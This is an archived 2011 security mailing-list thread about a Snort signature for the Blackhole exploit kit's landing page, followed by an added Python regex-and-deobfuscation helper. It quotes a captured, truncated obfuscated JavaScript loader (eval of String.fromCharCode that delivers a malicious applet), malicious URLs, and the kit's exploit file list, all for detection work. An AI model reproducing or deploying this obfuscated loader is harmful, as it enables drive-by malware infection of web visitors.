[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Chris Wakelin c.d.wakelin at reading.ac.uk
Mon Oct 3 10:07:59 EDT 2011


Yes, we're still getting lots of these too, especially now the Freshers have
arrived!

I think they're still including the unobfuscated "worms.jar" bit at the
top, so hopefully we've got coverage with sid 2013700.

They're also seeming to favour adding 30 to the character codes at the
moment:

function setCharAt(str,q,index) {
        return String.fromCharCode(str.charCodeAt(index) + 30);
}

Looking at the actual exploit kit, they're including the Java and PDF
exploits but not the Flash or HCP exploits (whatever HCP is?) at the moment.

For the record, here's my list of exploits and values of "e=" in the
download URL (names of the files may vary of course):

e=0 - Main.class - "octal" exploit for Java 1.6.0.0-23
e=1 - worms.jar - Java exploit, deobfuscates the parameter
e=2 - new.avi - Java exploit (I haven't collected one of these yet)
e=6 - 2fdp.php - PDF exploit (contains obfuscated Javascript)
e=7 - hcp2.php - HCP exploit (not used very often)
e=8 - field.swf - Flash shellcode exploit

Best Wishes,
Chris

On 03/10/11 14:46, Nick Randolph wrote:
> I've seen a pretty big jump in these at our site. Here are some sites they
> are hitting.
> 194.219.29.139:http://saveatlasshruggedomslovo.info/
> 194.219.29.139:http://downloadrandomslovostore.info/main.php
> 194.219.29.139:http://downloadrandomslovostore.info/content/worms.jar
> 194.219.29.139:http://downloadrandomslovostore.info/support/Pipe.class
> 194.219.29.139:http://newdownload-randomsslovo.info/getJavaInfo.jar
> 194.219.29.139:http://newdownload-randomsslovo.info/content/field.swf
> 
> There is a slight change to the fromCharCode section as well, this is what
> I saw this morning
> 
> String[c+'r'+'omChar'+'C'+'o'+'d'+"e"
> 
> Earlier in the packet there is a "c=f" declaration that makes the above.
> 
> On Tue, Sep 27, 2011 at 4:19 PM, Matthew Jonkman <
> jonkman at emergingthreatspro.com> wrote:
> 
>> Pedro is posting with a change, adding a match for |27|romChar|27| to help
>> protect that pcre. Good?
>>
>> Matt
>>
>>
>> On Sep 26, 2011, at 10:38 AM, Nathan wrote:
>>
>>> Similar to the discussion at
>>>
>> http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-September/015753.html
>>> it looks like thus far we have 3 landing styles.  One covered at the
>> above
>>> thread, another by Chris with \x09, and this third new proposed below.
>>>
>>> Only ET signature that fired was 'worms.jar' and I'd rather not rely
>> solely on
>>> the name of the archive for protection/detection of this kit.
>>>
>>> #/R should match relative to the previous content match.
>>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
>> CURRENT_EVENTS
>>> Blackhole Exploit Kit Landing Response Malicious applet";
>>> flow:established,from_server; content:"|0d 0a|<html><body><applet
>> code='";
>>> fast_pattern; nocase;
>>>
>> pcre:"/,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/iR";
>>> classtype:bad-unknown; sid:x; rev:1;)
>>>
>>> PCRE version 8.02 2010-03-19
>>>
>>>  re>
>>>
>> /,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/
>>> data>
>>>
>> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,
>>> 0: ,49.5*2,117+l,54.5*2,101+l,55*2,116+l,
>>> data>
>>>
>>>
>>> 09:19:23.734596 IP 194.176.191.62.80 > RFC_1918.1448: . 1:1261(1260) ack
>>> HTTP/1.1 200 OK
>>> Date: Mon, 26 Sep 2011 14:09:18 GMT
>>> Server: Apache/2.2.13 (Linux/SUSE)
>>> X-Powered-By: PHP/5.3.3
>>> Keep-Alive: timeout=15, max=100
>>> Connection: Keep-Alive
>>> Transfer-Encoding: chunked
>>> Content-Type: text/html
>>>
>>> 4d018
>>> <html><body><applet code='support.ForMail.class' archive='./worms.jar'
>>> width='1' height='1'><param name='p'
>>> value='e00oMDDBBBV2./fkqhQNQV%RD.qR/D3D./2h1Voeojfo=8zxa'/></applet><div
>>> id="qwe" style="visibility:hidden;">&#50;</div>
>>> <script>
>>> a=window['document']['getElementById']('qwe');
>>> try{app()}catch(q){
>>> if(1){
>>>        a.innerHTML=+[2];
>>>        cc='ev';
>>> }
>>> }
>>> try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
>>> 1;}catch(q){c='f';v='TML';}
>>> z=a['inne'+'rH'+v];
>>> try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
>>> 1;}catch(q){l=z*1}
>>> if(a.innerHTML == '2')
>>> e=window[cc+'al'];
>>>
>> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,56*2,97
>>>
>> +l,51.5*2,101+l,16*2,105+l,57.5*2,32+l,54*2,111+l,48.5*2,100+l,52.5*2,110+l,51.5*2,46+l,23*2,46+l,30*2,47+l,52*2,49+l,31*2,60+l,23.5*2,99+l,50.5*2,110+l,58*2,
>>>
>>> Thanks,
>>> Nathan
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>> Support Emerging Threats! Subscribe to Emerging Threats Pro
>> http://www.emergingthreatspro.com
>>> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
>> Current!
>>
>>
>> ----------------------------------------------------
>> Matt Jonkman
>> Emerging Threats Pro
>> Open Information Security Foundation (OISF)
>> Phone 866-504-2523 x110
>> http://www.emergingthreatspro.com
>> http://www.openinfosecfoundation.org
>> ----------------------------------------------------
>>
>>
>>
> 
> 
> 


-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094
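An added analysis helper, written for this page and not part of the thread or of any ET rule: it runs Nathan's proposed pcre (as a plain Python regex; Snort's /R relative anchor is dropped, so it is a straight search over the payload) against the captured fromCharCode argument list quoted above, resolves the concatenated String[...] method name that Nick's and Nathan's captures build from string pieces and the variable c, decodes the N*M / N+l terms for a given value of l, and ports the +30 setCharAt shift. SAMPLE_ARGS is the leading part of the argument list from the captured landing page; l is left as a parameter because the page derives it from the hidden div at run time. All function names here are mine.

```python
import re

# Nathan's proposed pcre, minus Snort's /R modifier (plain search here).
LANDING_PCRE = re.compile(
    r",[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],",
    re.IGNORECASE,
)

# Leading part of the fromCharCode argument list from the captured landing page
# quoted in this thread (cut after "32+l,"); constructed sample for this script.
SAMPLE_ARGS = (
    "50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,"
    "58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,"
    "24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,"
)

# One argument term: "49.5*2", "117+l" or a bare number.
_TERM = re.compile(
    r"^(?:(?P<mul_a>[0-9.]+)\*(?P<mul_b>\d+)|(?P<add_a>\d+)\+(?P<var>[a-z])|(?P<plain>\d+))$"
)

# Pieces of a concatenated name: 'quoted', "quoted" or a bare identifier.
_PIECE = re.compile(r"""'([^']*)'|"([^"]*)"|\b([A-Za-z_]\w*)\b""")


def signature_hit(payload):
    """Return the slice the proposed pcre matches in payload, or None."""
    m = LANDING_PCRE.search(payload)
    return m.group(0) if m else None


def resolve_method_name(expr, bindings):
    """Join the quoted pieces of a String[...] index expression, substituting variables.

    Shows why a literal "fromCharCode" content match misses these pages:
    with c='f', c+'r'+'omChar'+'C'+'o'+'d'+"e" only becomes the name at run time.
    """
    out = []
    for sq, dq, ident in _PIECE.findall(expr):
        if ident:
            out.append(bindings[ident])  # e.g. c -> 'f'
        else:
            out.append(sq if sq else dq)
    return "".join(out)


def decode_charcode_args(arg_text, l):
    """Evaluate each N*M, N+l or N term and map the codes through chr()."""
    chars = []
    for term in filter(None, (t.strip() for t in arg_text.split(","))):
        m = _TERM.match(term)
        if not m:
            raise ValueError("unexpected term: %r" % term)
        if m.group("mul_a") is not None:
            code = float(m.group("mul_a")) * int(m.group("mul_b"))
        elif m.group("add_a") is not None:
            code = int(m.group("add_a")) + l  # the single-letter variable is l
        else:
            code = int(m.group("plain"))
        chars.append(chr(int(round(code))))
    return "".join(chars)


def shift_charcodes(s, delta):
    """Port of the kit's setCharAt helper applied to a whole string: add delta to each code."""
    return "".join(chr(ord(ch) + delta) for ch in s)


if __name__ == "__main__":
    print("pcre hit:", signature_hit(SAMPLE_ARGS))
    print("method  :", resolve_method_name("c+'r'+'omChar'+'C'+'o'+'d'+\"e\"", {"c": "f"}))
    print("decoded :", decode_charcode_args(SAMPLE_ARGS, l=0))
```

With l=0 the sample decodes to the kit's usual "Please wait page is loading" document.write() stub, and the regex match is the same slice pcretest reported in the thread (starting at ",49.5*2"); decoding with another value of l gives unreadable text, which is the check an analyst uses to confirm what the hidden div feeds into l on a given capture.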

